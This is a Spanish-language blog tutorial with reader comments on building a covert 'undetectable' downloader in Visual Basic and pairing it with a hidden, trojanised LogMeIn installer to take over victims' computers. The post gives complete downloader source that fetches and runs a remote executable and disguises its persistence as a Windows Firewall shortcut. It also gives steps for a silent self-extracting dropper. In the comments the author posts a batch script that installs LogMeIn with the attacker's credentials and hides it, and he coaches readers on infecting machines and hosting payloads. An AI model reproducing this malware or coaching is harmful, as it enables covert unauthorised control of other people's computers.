Downloader en VB INDETECTABLE! –> Complemento para el Troyano con LogMeIn

Downloader en VB.

Este downloader, fue creado con la intencion de utilizarlo con este post, pero cabe aclarar que sirve para cualquier otra aplicacion.

Qué es un Downloader?

Un downloader se utiliza para descargar en la maquina victima un programa pesado, es desir, que ocupa muchos MB entonces se hace imposible camuflarlo para mandarlo por messenger por ejemplo. En general, este “Programa Pesado” es un virus, o un troyano como en el caso nuestro.

Lo que hace es, basicamente, generar un server liviano, (20k) y cuando es ejecutado por la victima, se “instala” secretamente en la maquina y comienza a descargar el archivo, desde la URL que nosotros le hayamos indicado…  cuando la descarga es finalizada, ejecuta el archivo descargado.

Eso es todo.

Comenzamos con el desarrollo de nuestro Downloader

El codigo está escrito en VB, solo hay que pegar el codigo en un Form,  compilar y Listo! no necesita de ningun complemento.

Solo hay que editar 2 lineas, una es la URL de donde se descargara el archivo, y la otra es el Path de destino (donde se guardará) el mismo.

El downloader puede descargar y ejecutar cualquier extension de archivo, siempre y cuando esa extension esté asociada con algun programa en la PC victima. (comando Shell Execute)

Este downloader, al ser ejecutado, guarda un acceso directo al ejecutable del mismo, en la carpeta de inicio del sistema (menu inicio–>programas–>inicio), esto es por si la victima apaga la pc y el archivo no se ha terminado de descargar aun, entonces cuando la vuelva a prender, se comenzara a descargar nuevamente. Una vez terminada la descarga, el acceso directo se elimina.

Este es el codigo fuente del Downloader en VB:

'declaraciones para ejecutar una vez descargado
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_SHOWNORMAL = 1
'declaraciones para guardar el archivo ini
Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Private Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Private Declare Function FileExists Lib "shlwapi.dll" Alias "PathFileExistsA" (ByVal pszPath As String) As Long
'declaraciones para descargar
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
'declaraciones para guardar el acceso directon en el inicio del sistema
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Private Const CSIDL_STARTUP = &H7
Private Const CSIDL_COMMON_STARTUP = &H18
Dim obj As Object
Dim acceso_directo As Object

Private Sub form_load()
Dim estado As String
Iniciarconwindows
estado = INI_Read(App.Path & "\FirewallOptions.ini", "Estado", "Update")
If Trim(estado) = "Listo!" Then
Quitariniciarconwindows
End
End If
Dim sSourceUrl As String
Dim sDestinationUrl As String

sSourceUrl = "http://www.mipagina.com.ar/lordblacksuca.exe"  ' esta es la URL de donde se descarga el archivo
sDestinationUrl = "C:\lordblacksuca.msi"  'este es el path donde se va a guardar el archivo

Call INI_Write(App.Path & "\FirewallOptions.ini", "Estado", "Update", "Descargando")
DownloadFile sSourceUrl, sDestinationUrl
Call ShellExecute(Me.hwnd, vbNullString, sDestinationUrl, vbNullString, vbNullString, SW_SHOWNORMAL)
Call INI_Write(App.Path & "\FirewallOptions.ini", "Estado", "Update", "Listo!")
End
End Sub
'funcion para descargar
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
'funcion para que el programa inicie cuando se inicia windows
Private Function Iniciarconwindows()
Set obj = CreateObject("wscript.Shell")
Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & "\Windows Firewall.lnk")
With acceso_directo
.TargetPath = App.Path & "\" & App.EXEName
.Save
End With
End Function
Function Quitariniciarconwindows()
If Dir(GetSpecialfolder(CSIDL_STARTUP) & "\Comodin.lnk", vbNormal) = "" Then Exit Function
Call Kill(GetSpecialfolder(CSIDL_STARTUP) & "\Comodin.lnk")
End Function
'funcion para escribir y leer de un ini
Public Function INI_Read(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, Optional ByVal Default As String) As String
On Error GoTo ErrOut
Dim Size As Integer
Dim Value As String
'Comprobamos que el archivo existe:
If Not CBool(FileExists(Filename)) Then Err.Raise 53
'Se define el tamaño maximo de caracteres
'que podra tener la variable Value:
Value = Space(256)
'Se utiliza la función para obtener
'el valor de la clave:
Size = GetPrivateProfileString(Key_Value, Key_Name, Default, Value, Len(Value), Filename)
'Si el tamaño es mayor a 0 entonces
'se ha encontrado el valor de la clave:
If Size > 0 Then
Value = VBA.Left$(Value, Size)
'Devolvemos el valor de la clave:
If VBA.Right$(VBA.Trim$(Value), 1) = Chr(0) Then Value = VBA.Left$(VBA.Trim$(Value), Len(VBA.Trim$(Value)) - 1)
INI_Read = VBA.Trim$(Value)
Exit Function
End If
ErrOut:
INI_Read = Default
End Function
'Metodo de escritura. Si el archivo al que se refiere el parametro Filename
'no existe se crea automaticamente:
Public Sub INI_Write(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, ByVal Value As String)
On Error GoTo ErrOut
Dim Size As Integer
'Escribimos el valor de la clave:
Size = WritePrivateProfileString(Key_Value, Key_Name, Value, Filename)
ErrOut:
End Sub

'funcion para obtener el path al inicio del sistema
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function

Para que no se gasten en Copiar y Pegar, aca les dejo el Proyecto de Visual Basic para que descargen:

Downloader en VB

Eso fue todo en cuanto al Downloader.


Complementando el Troyano Indetectable con LogMeIn

Como habrán visto, el troyano se compone de 3 archivos. El Instalador Modificado de LogMeIn, el Patch para hacerlo invisible y un archivo .bat, para coordinar todo. Ahora, tenemos que unirlos a todos en un solo .exe

Aclaro en este punto, que existen muchas formas de hacerlo, cualquiera es válida, solo hay que tener una precaución:

Este troyano fue ideado para ejecutarse mediante una Inyección USB por lo tanto habia cosas que no importaban, pero que ahora si, por ejemplo, el archivo ejecutar.bat contiene nuestros datos de acceso a la cuenta de LogMeIn, por lo tanto, si el downloader descarga el archivo, la victima tendria “al alcance de sus manos” nuestros datos, entonces resultariamos nosotros los “hackeados”.

Eso se puede solucionar, convirtiendo el archivo .bat a .exe mediante el programa Bat to Exe Converter de esta forma:

Convertir el .bat a .exe

1º Descargar al archivo:  http://rapidshare.com/files/270764528/DownloaderVB_y_Bat_to_Exe_Converter.rar

2º Seleccionar el archivo .bat a ser convertido.

3º Configurar las opciones ASI:

Opciones de configuración de Bat to Exe Converter

Opciones de configuración de Bat to Exe Converter

4º Apretar Compile y Listo!

Teniendo ese tema solucionado, solo resta unir todos los archivos necesarios para la ejecución.

Para ello, utilizamos el WinRar, y hacemos un archivo SelfExtract invisible, y que al finalizar ejecute el archivo, ejecutar.exe de esta forma:

1º Seleccionar los archivos: ejecutar.exe, el Instalador Modificado de Logmein y el Patch para hacerlo invisible, hacer click derecho sobre uno de ellos y poner Añadir al Archivo… o Add to file… si esta en inglés.  (DEBES tener el WinRar instalado)

2º Seleccionamos Crear un Archivo SFX y Crear un Archivo sólido

Creando el único ejecutable

Creando el único ejecutable

3º En la pestaña Avanzado, hacemos click en Opciones SFX… ahí debemos indicar, que los archivos se extraigan en la misma carpeta y escribimos el nombre del archivo que tiene que ejecutar al finalizar la extracción:

Opciones de SFX

Opciones de SFX

4º En la pestaña Modos, configurar de la siguiente forma:

Opciones SFX "Modos"

Opciones SFX "Modos"

5º Si lo deseas en la pestaña Texto e Icono, puedes seleccionar un icono para el exe final.

6º Apretar en Aceptar y Listo!

Eso fue todo.

Este archivo que hemos creado, es un único archivo .exe, que al ser ejecutado, descomprime los otros archivos en la misma carpeta, y luego ejecuta el archivo llamado ejecutar.exe que es el que inicia todo el proceso de instalacion.

OBIAMENTE, los pasos a seguir, son subir el ultimo archivo creado a un ftp, y apuntar esa URL al downloader, para que este lo descargue y ejecute.

En un próximo post, vemos como hacer para camuflar el server del downloader.

Diego Sucaria

Software & Hardware Developer, Network Administrator, SysAdmin. Estudiante de Ingeniería en Computación de la Universidad Católica de Córdoba

95 Comments

  1. Lordblacksuca   •     Author

    mou69
    Agosto 24th, 2009 on 11:09 edit

    Uf, tiene buenisima pinta, pero yo al menos me perdi…, no se realmente que hacer con los 3 archivos del downloader una vez que modifico el form…

    al downloader lo compilas y se genera 1 solo exe, que es el downloader propiamente dicho

  2. mou69   •  

    Bien, con que programa puedo compilarlo? y posteriormente que debo de hacer con el .exe?
    Uf, espero no resultar demasiado pesado. Gracias.

  3. mou69   •  

    Esta bien, gracias por tu paciencia, intentare leer las explicaciones atentamente y seguir los pasos explicados, veremos que sale…, saludos.

  4. mou69   •  

    Bueno, nada mas comenzar, viene el primer problema,agrego los 3 archivos a la compilacion del proyecto en el visual basic portable y cuando le doy a ejecutar me lanza el siguiente error:

    Error de compilacion:
    Se esperaba: Identificador

    Que hago mal?

  5. mou69   •  

    Me estoy haciendo la picha un lio con esto de agregar los archivos, puedes explicar como se hace por favor?
    Saludos.

  6. Lordblacksuca   •     Author

    deberias decirme en que linea te da el error, porque ami no me aparece

  7. mou69   •  

    Simplemente agrego el form y posteriormente los otros dos archivos y le doy a ejecutar, sospecho que no los estoy agregando bien…, si no es mucho pedir podrias explicar o colgar algun tutorial que una los dos post, la verdad es que estoy bastante perdido….

  8. Lordblacksuca   •     Author

    el problema es que no manejas VB.
    tenes que agregar el form, despues le haces click derecho y view code. y ahi copias el codigo que puse arriba, eso es todo!!! luego, archivo, make proyect1.exe

  9. mou69   •  

    Lo siento pero no me sale, mucho me temo que me estoy desmoralizando…, podrias hacer una especie de tuto por favor?. Saludos

  10. Lordblacksuca   •     Author

    jejeje…. mira, no hay problema te ayudo todo lo que quieras, peeeero, el tutorial esta simple.. seguramente es la primera vez que usas VB.

    hagamos una cosa… decime en donde vas a subir el troyano, entonces yo te hago el downloader

    es decir… desime, donde va a esta tu http://www.tupagina.com/troyano.exe entonces yo te hago el ejecutable que descarge y ejecute ese archivo y te lo paso

  11. mou69   •  

    ok,existe algun hosting que me recomendarias? o es lo mismo?. Gracias por tu paciencia.

  12. Lordblacksuca   •     Author

    es lo mismo cualquiera es lo mismo… yo uso hostings pagos…pero para probar cualquier host gratis sirve

  13. mou69   •  

    De todas maneras me gustaria aprender ha hacerlo yo mismo… y si, estas en lo cierto es la primera vez que uso VB, tengo la cabeza como un bombo 😉

  14. Lordblacksuca   •     Author

    te recomiendo que empieces haciendo algunos hola mundo en VB con algun tuto que encuentres por la red. (hay muuuuchos)

  15. mou69   •  

    (Tardan un plazo de 24 horas para darlo de alta)

  16. Lordblacksuca   •     Author

    siii.. ahora subi ahi el archivo autoextraible q generas en la segunda parte del post

  17. Lordblacksuca   •     Author

    no.. al troyano lo tenes que subir vos, con los datos de conexion a la cuenta… es decir, TODO el archivo autoextraible que generas en la segunda parte del tutorial.

  18. lord_Plasmaex   •  

    saludos tengo un lijerito problema con el primero troyano y es que en vista no me ejecuta el .bat y me dice el siguiente error LMI_Backdoor_by_Lordblacksuca.msi is not recognized as an internal or external command operable program or batch file.
    instalacion terminada.
    lo mismo con el pacth invisible y si intento ejecutar el msi solo sin el .bat este se ejecuta e instala pero sin los datos de mi cuenta y me da el error de que no se puede vincular con la cuenta.
    porque vista no reconoce los comando del .bat me podrian ayudar
    gracias.

  19. lord_Plasmaex   •  

    Perdon por si no me explique bien el .bat se ejcuta,
    yo lo ejecuto como administrador por lo de los permisos pero al ejecutarlo es que me sale el error que escribi en el comentario anterior.
    otra cosa en mi caso lo que quiero es solamente que la pc victima que ya tiene el logmein instalado y configurado solo quiero que este mismo se vuelva invisible para que no pueda desactivarlo cuando gusto simplemente que no lo encuentre para desactivarlo y que cuando entre a la pc no aparesca el mensajito que aparece por eso me gusto el que ustedes realizaron ya lo probe en xp y funciona de maravilla incluso cuando lo ejecute en esa pc se reinstalo el que tenia y como quedo con todos los datos que le envie en el .bat solo perdi conexion por un instante y cuando refresque la paguina ya tenia contro de nuevo y esta vez invisible pero para vista no me salio asi para ver que tal la ayudita…

  20. Lordblacksuca   •     Author

    hola… lametablemente en vista no lo he probado. siempre lo probe en maquinas con XP.

    el tema del error que te da el bat, es por que no encuentra el comando para ejecutar el instalador… y si ejecutas el instalador manualmente, no te va a servir, porque se instala sin los datos de acceso a la cuenta.

    PARA QUE TE FUNCIONE tenes que reemplazar las lineas en donde se ejecutan los ejecutables… asi:
    START EJECUTABLE.exe
    entones ahi te reconoce el comando

    esto lo tenes que hacer en todos los ejecutables.

    te quedaria asi: (PARA WIN VISTA)

    @echo off
    START LMI_Backdoor_by_Lordblacksuca.msi /quiet USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free

    taskkill /f /IM LogMeInSystray.exe
    taskkill /f /IM LogMeIn.exe

    START logmein-patch.exe

    REG DELETE HKEY_CLASSES_ROOT\Installer\Products\675138F764267C245B32553B9F5690CC /f
    exit

    HAY OTRA COSA MAS
    he notado que en algunas PCs hay diferencias en el comando taskkill tskill es desir… en maquinas con vista.. el taskkill funciona perfectamente, pero en xp aveces no. todavia no he encontrado el porque. pero igual la solucion es usar tskill

  21. mou69   •  

    He probado con los hostings webcindario, t35, runhosting, lycos y alguno mas…, y no me deja subir el archivo al pesar este 10 MG, a ver si me podeis recomendar alguno por favor. Gracias y saludos para tod@s.

  22. mou69   •  

    hola, he estado mirando y se que hay miles de hostings, pero que sean gratuitos y dejen alojar un archivo de 10 MG no encontre ninguno, tampoco http://www.unlugar.com, saludos.

  23. SoDark   •  

    La solucion no pasa por usar TSKILL lo estubo probando un colega y no funcionaba bien, el problema lo encontrareis en los Windows XP Home Edition que no tienen el comando TASKKILL.

    Solucion? En el pack de archivos incluir el TASKILL.exe del windows XP Profesional que encontrareis en Windows\system32 y copiarlo en Windows\System32 del Windows XP Home Edition, almenos es como lo he hecho yo y funciona perfectamente. Obviamente sera lo primero que debais hacer antes de poner a instalar el logmein y matar procesos.

  24. Daniel   •  

    Ojo que todos los convertidores de bat a exe en realidad no compilan sino que guardan el bat dentro del exe y al ejecutarlo copian el bat original a una
    carpeta temporal y lo ejecuta de ahi, solo que le cambia el nombre (ej hsf7sf7.bat) , al terminar la instalacion lo elimina. aun asi es muy peligroso ya que alguien con un poco de conocimientos puede encontrar el bat y ver todos los datos que usamos( cuenta de logmein y contraseña de los equipos en el que esta instalado). lo digo porque ya lo verifique
    con varios convertidores BAT to EXE.

    • Lordblacksuca   •     Author

      tenes toda la razon. alguna idea de como solucionarlo?
      como dije en el post, estaba todo pensado para una inyeccion usb, en donde TODO queda en nuestro pendrive.

  25. M1n0s   •  

    estimado señor Lordblacksuca…

    estoy programando su archivo BAT, ya que me es supremamente facil pasarlo a EXE, en cuanto este listo le mandare el link de descarga… y me gustaria que tuvieramos una charla privada…

    Att. M1n0s

    • Lordblacksuca   •     Author

      Hola.
      Te estoy mandando un mail, para ponernos en contacto.

  26. Pingback: Troyano con LogMeIn –> Actualización a la versión 4.0.0.966 | Lordblacksuca

  27. julian   •  

    viejo, hay muchas lineas de codigo que subraya, porque?, por ejemplo serian
    -Private Const CSIDL_STARTUP = &H7
    -Private Const CSIDL_COMMON_STARTUP = &H18
    -estado = INI_Read(App.Path& “\FirewallOptions.ini”, “Estado”, “Update”)
    -Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Descargando”)
    Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Listo!”)
    Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & “\Windows Firewall.lnk”)
    .TargetPath = App.Path & “\” & App.EXEName
    If Dir(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”, vbNormal) = “” Then Exit Function
    Call Kill(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”)
    If Size > 0 Then

    psdata, el link ke dejaste con el codigo de vb esta erroneo abre es el de descarga para pasar de .bat a .exe

  28. Lordblacksuca   •     Author

    Hola, primero… esta todo en el mismo rar. lo que me estas mostrando, es parte del codigo, por lo que lo debes tener.

    con respecto a tu duda, la parte que me estas mostrando, es la que hace que si la victima apaga la pc antes de que se termine de descargar, al iniciar la pc de nuevo, comienze la descarga… al terminar… no se inicia mas.

    no se porque te da el error, no deberia hacerlo. Estas en Visual Basic 6?

  29. julian   •  

    si estoy trabajando en visual basic 6 y son todas esas lineas las ke me subraya, aparte de eso le doy compilar y me aparece error de compilacion: se esperaba: expresion, y me subraya el &,,,

  30. julian   •  

    de casualidad no lo tienes para eclipse?

  31. julian   •  

    a ya coji el del archivo .rar, ahi si lo abri y ese esta bueno… muchas gracias!!, a otra curiosidad donde dice la ruta de la patch, es donde le va a quedar instalado a la victima o un archivo ke se genera y queda guardado en mi computador…

  32. Lordblacksuca   •     Author

    bueno, ahora entiendo lo que pasaba… tu copiaste el codigo de la web y lo pusiste en un nuevo proyecto de VB… claro… te tiraba los errores porque no estaban cargados los complementos ni referencias necesarias.

    donde dice la ruta…. es donde se va a descargar en la pc victima… por lo general te recomiendo que sea en una ubicacion donde windows te permita escribir.

  33. toro   •  

    dejo de crear el archivo .exe, que puede estar pasando, si se instalo como lo elimino?, el archivo que habia creado anteriormente lo elimine, y ahora quiero crearlo y no lo hace, muestra como si compilara pero no crea el archivo

  34. toro   •  

    solo me esta creando lo sienguiente
    FirewallOptions.ini
    no se crea el ejecutable para mandar… cual podria ser el motivo.

  35. toro   •  

    cuando aparecio el .exe ocurria lo siguiente
    subsistema MS-DOS de 16b:
    c:\docume…..
    la CPU NTVDM ha encontrado una instruccion no permitida.
    CS:075 a IP:011d OP: 2e 63 6f 6d 20 Elija “cerrar” para finalizar la aplicación.
    cerrar<<<>>omitir,

    le di omitir, y se quedo la ventana de DOS activa con el _ rebotando por todos lados, por esto lo elimine, ahora lo quiero volver a crear y no deja.

  36. Lordblacksuca   •     Author

    bueno… lamentablemente te debo decir que tienes algun problema en tu pc.

    visual basic anda en xp y vista el 100% de los casos.
    si ves que la barra de copilacion carga al 100 entonces COMPILA… jejeje no se donde guardas el exe. ahhh quizas… aunque no creo que funcione, porque es indetectable…. proba desactivar el antivirus

    te recomiendo que depures bien el codigo para saber en que linea te da el error.

    ahh, y te pido una cosa…. bien de onda… por favor, escribe todas tus inquietudes en un solo comenario, no es necesario uno por cada pregunta, asi es más dificil leerlos.

  37. toro   •  

    disculpame, esque las dudas se me surgen cuando sigo trabajando, igual muchas gracias, ps lo ejecute desde un computador con vista y creo un .exe espero que ese funcione, porque lo hice desde otro xp y no creaba el ejecutable, no se por que, mi ultima duda es como se si esta descargando el archivo, o cuando llego, y manejo el computador remoto con el logmein que tu dejaste modificado,

  38. Lordblacksuca   •     Author

    bueno, como el downloader es totalmente invisible…. no hay forma de ver el progreso, sin embargo, te puedes fijar en el archivo firewalloptions.ini, que es en donde dice si termino o no.

    y la idea es esa, que cuando vayas a tu casa, puedas entrar directamente.

  39. toro   •  

    oye, osea que requiero estar en el computador de la victima descargar el VB, luego darle compilar, y ahora si irme…?? no hay posibilidad de crear un .exe que solo sea enviar y haga esas cosas?

  40. Lordblacksuca   •     Author

    noooooo!!!…. que sentido podria tener eso? please!! jejeje.

    cuando tengas TU ejecutable…. eso es lo unico que le tenes que mandar a tu victima, para que esta lo ejecute y listo.

  41. toro   •  

    el archivo me esta descargando perfectamente, creo “que lo esta ejecutando al descargar(no estoy bn seguro de esta parte, porque lo utilize en mi casa, y se donde descargo creo que se ejecuto y dejo visible los archivos.)”, el otro problema que encuentro es que lo estube utilizando con un amigo a el le dije que lo bajara de la pagina de descarga, y ejecutara el archivo, el me dijo que le aparecio con un spyware donde iba a quedar alojado el programa, me dijo que el programa aparecio activo, pero hay un problema yo entro a la pagina de logmein, y el pc de el no aparece registrado. le doy actualizar y aun asi no sucede… que puede estar sucediendo?

  42. Lordblacksuca   •     Author

    bien, lo que puede estar pasando con tu amigo, es que algunos firewall o antispyware, detectan a logmein como un spyware, y le bloquean la salida de datos.

    te propongo lo siguiente: prueba el downloader, para que te descargue cualquier cosa en tu pc, una imagen..lo que sea. ejecutalo, y comproba que compilaste bien, es decir, fijate si la imagen o lo que fuere, se descargó bien.

    por otro lado, bajate el troyano con logmein ultima version, y probalo solo… en tu mauqina si queres tqambien puede ser.

    cuando te asegures que ambas partes funcionen, a TU modo, ya estas listo, para realizar lo que quieras.

  43. Renato123   •  

    Ola una duda lo puedo hacer en visual estudio.net esq solo ese tengo y el link del vb 6 portable no funciona.. agradeceria su respuesta…

  44. Lordblacksuca   •     Author

    Hola, sinceramente te pido disculpas. No uso visual studio.net

    sin embargo, tengo entendido, que solo hay unas diferencias en cuanto a declaracion y parametros de funciones y otras cosas mas.

    deberias probar, a ver que pasa.

    cualquier cosa, aca te dejo otro link para el VB6 portable http://www.megaupload.com/?d=PRMUAWXB

  45. Renato123   •  

    muchas gracias ia con vb 6 si esta.. ahora tengo un problema me cree en hosting en miarroba y ia cree un arhicho .exe kiero subirlo pero no puedo como puedo hacer ..:( ayudame

  46. Lordblacksuca   •     Author

    tenes que usar algun cliente FTP como el filezilla por ejemplo.

    pero esos hostings seguro que te ofrecen una aplicacion web para subir archivos. busca en alguna parte que diga algo de upload o file manager

  47. Renato123   •  

    si eso si sale osea lo pongo para cargar y naa me bota un error talvez no acepta archivos .exe no se..:S (disculpa si no fui claro..)

  48. Lordblacksuca   •     Author

    mmm….as a tener que probar con otro hosting entonces.

  49. Renato123   •  

    Ia buzke y nada creo q se me va a ser imposible usar este metodo..:(..si encuentras algo t agradeceria q me comunicaras..gracias x tu tiempo

  50. Renato123   •  

    Subi el exe a mediafire.. y lo intento jalar con el dowloader y naa no me sale ningun error pero no pasa nada..:s q puedo estar haciendo mal?? ayuda xfa

  51. Lordblacksuca   •     Author

    no… por favor. mediafire es un servidor de descargas, pero no tienes descarga directa al archivo, lo que necesitas es un hosting, mediante el cual puedas acceder al archivo en descarga directa. http://www.tuhost.com/archivo.exe

    PONE en google: Hosting Gratis

    vas a tener miles de resultados en donde vas a poder tener hosting gratuito.

    con miles, me refiero a MUCHISIMOS.

  52. Pelax   •  

    Hola me funciono exelente el downloader ya lo probe en mi maquina virtual y andubo de 10 gracias era lo q necesitaba ver como funcionaba en dowloader en VB.
    cualquier problema q encuentre te la hago saber.

    gracias

    • Lordblacksuca   •     Author

      De nada! me alegra que te guste el downloader.

      Recuerda, siempre, tienes que hacer una sola descarga dentro del codigo, si haces mas de una, los AV te detectan

  53. andres   •  

    Hola Lordblacksuca te cuento que ya descargue el archivo del Downloader y también el programa visual basic. Pero no tengo mucho cono cimiento sobre el programa, el dowloader son 3 archivos y uno abre con el vb ya le modifique las dos líneas la URL de donde se descargara el archivo, y la otra es el Path de destino pero no se después que debo hacer o como se guarda o con que extensión y tampoco sé como mandárselo a la víctima ..
    Te agradezco tu colaboración y espero tu respuesta.
    Gracias.

  54. Lordblacksuca   •     Author

    cuando hayas modificado las lineas necesarias en el codigo fuente, tenes que compilar… Archivo –> Generar ejecutable o si esta en ingles File–> Make exe

    ese archivo que generes tenes que mandar

  55. andres   •  

    Gracias Lordblacksuca por la explicación.

    Qué pena molestarte de nuevo pero tengo dos preguntas.

    1 ¿cómo puedo cambiar el icono del ejecutable que voy a mandar a la víctima?

    2 ¿el archivo para la descargar lo estoy subiendo en el hosting http://www.zymic.com pero no recibe .exe cual me recomiendas y que sea gratuito?
    Gracias

  56. Lordblacksuca   •     Author

    1) para cambiar el icono, tenes que cargarle un icono al Form. si te fijas en el panel de propiedades de VB, cuando seleccionas Form1 aparece una propiedad que se llama icon, seleccionas un icono y listo.

    2) hay muchos hostings, yo uso hostings pagos, pero proba con freexa.com freewebtown.com etc etc

  57. msl8902   •  

    alguien q recomiendde un buen host para subir el .exe

  58. msl8902   •  

    alguien q me recomiende un host gratis para poder subir el ejecutable xq pesa 14MB y los host q consigo dejan descargar un maximo de 10MB

  59. msl8902   •  

    Lordblacksuca como se yo cuando se esta descargando el ejecutable? yo lo stoy probando en mi mismo dandole click al resultado de compilar pero pero yo no veo que se descarga nada en la carpeta de destino. sera que hice algo mal men.?

  60. Lordblacksuca   •     Author

    no hay forma de saberlo! solo hasta cuando se termina de descargar.

  61. furian   •  

    Hola en primer lugar muchísimas gracias por el troyano, te comento que no puedo bajar el archivo de rapidshare ya van 3 dias que trato pero rapidshare me sigue diciendo que no hay slots disponibles que trate en 2 minutos y ya trate varias veces te pido por favor que subas el programa hecho en visual basic al megaupload please!!! GRACIAS XD!!

  62. furian   •  

    muchas gracias ya logre bajarlo y como dice el tutorial ya le cambie las dos lineas “sSourceUrl =” y “sDestinationUrl =” pero no pasa nada.. lo estuve probando en una maquina virtual con conexión a Internet y nada… inmediatamente ejecuto el downloader aparece un archivo “FirewallOptions.ini” y en el contenido pone:
    [Estado]
    Update=Listo!
    Pero no descarga nada… leí en uno de los anteriores comentarios que aconsejabas probar primero con una imagen ya lo hice y nada, pasa lo mismo, no descarga nada. Que crees que pueda estar pasando, gracias por tu paciencia XD.

  63. Lordblacksuca   •     Author

    mmm… deberías asegurarte que la dirección del archivo a descargar esté bien escrita… con http:// etc

    podés probarlo en tu pc sin problemas, siempre y cuando pongas una imagen o un mp3 a descargar cosa que no sea algo que la dañe.

  64. ivaancrzg   •  

    oyeee disculpaaa Lordblacksuca pero estoy bien weyy en esto y no entiendo nada y pues qeria ver si me puedes explicar detalladamente 🙂 te dejo mi correo es ivanedi_sk@hot… te lo agradeceria demasiado 🙂

  65. carlos   •  

    amigo una pregunta si logro tener un hosting para lo del downloader tengo que montar un ftp? o con solo tener el hosting puedo subir el paquete autoextraible del logmein, crear el downloader y listo?

  66. carlos   •  

    donde está el VB de 6MB para descargarlo, puedes darme el link de descarga directa?

  67. msl8902   •  

    MEN PERO RECOMIENDA UN HOST GRATUITO PRA SUBIR EL ARCHIVO

  68. Wolf   •  

    Men hasta ahora no puedo hacer lo del hosting..e intentado en varias paginas y al final no puedo econtrar la estructura http://www.algo.com/instalador.exe siempre sale clik en descargar pero no me bota el link o no se que estoy haciendo mal men varios tienen ese mismo problema..ojala puedas hacer un tuto..gracias por todo el material dado

  69. lord   •  

    mi pana como haria yo para lo siguiente; ya infecte una pc pero le cambiaron la contraseña de acceso al ordenador. Entonces hay alguna manera de enviarle algo sencillo q solo le cambie la contraseña nuevamente por una que yo quiera? osea q restrablezca la contraseña. Algo sencillo para no despertar sospechas. AYUDA xfavor

    • Lordblacksuca   •     Author

      mmm, si le cambiaron la contraseña me temo que la unica forma es enviarle el troyano de nuevo, asi el logmein se reinstala.

  70. lord   •  

    ya eso lo hice hermano y continua igual, tengo 4 meses tratando de solucionar este problema.. que otra sulucion me recomiendas?

  71. lord   •  

    otro dato que se del ordenador es que intentaron cambiar la ubicacion de los archivos. Osea movieron la carpeta de instalacion. Por tal manera pienso yo que al enviarle de nuevo el programa y reinstalar puede ser que se haya creado un conflicto con las carpetas de archivos duplicados. Porque hace 1 mes (depues de haberle enviado nuevamente el archivo) aceptaba el passw pero luego daba un error la pag. Ahora lo que no me acepta es el password cuando antes si lo hacia. El problema esq no poseo acceso fisico a la pc. Se que debes estar muy ocupado pero agradeceria si podria colaborarme

  72. Lordblacksuca   •     Author

    me temo que esa es la unica solucion. trata de enviarselo de nuevo… la unica forma de resetear el password de logmein en con un disco de inicio en modo seguro.. pero eso seria mucho mas complicado si no tienes acceso fisico.

    Yo probaria enviarselo de nuevo otra vez. sino, intenta hacer que formatee le maquina para empezar de cero.

  73. cesar   •  

    Lord CUANDO saldra el logmein para windows 7. t agradezco por anticipado tu respuesta.

    • Lordblacksuca   •     Author

      Tanto logmein como el troyano funcionan en windows 7

  74. ROLA   •  

    hola lord desde ya mis felicitaciones por todo esto, bueno hasta ahora me funciono todo, pero quiero hacerte una pregunta, esto del downloader tambien funciona en windows vista y windows 7??? ahh y por cierto los antivirus lo detectan o no, cuando se hace una instalacion desde el downloader. bueno es todo y gracias uan vez mas…

    • Lordblacksuca   •     Author

      Hola, si el downloader funciona en windows vista y windows 7 sin problemas.

      No es detectado por ningun antivirus!

  75. ROLA   •  

    hola lord, bueno estuve buscando un host gratuito con descarga directa, pero no encuentro ninguna y menos uno al cual se le pueda cargar archivos con mas de 10 megas. favor de recomendarme una. gracias

  76. Gas   •  

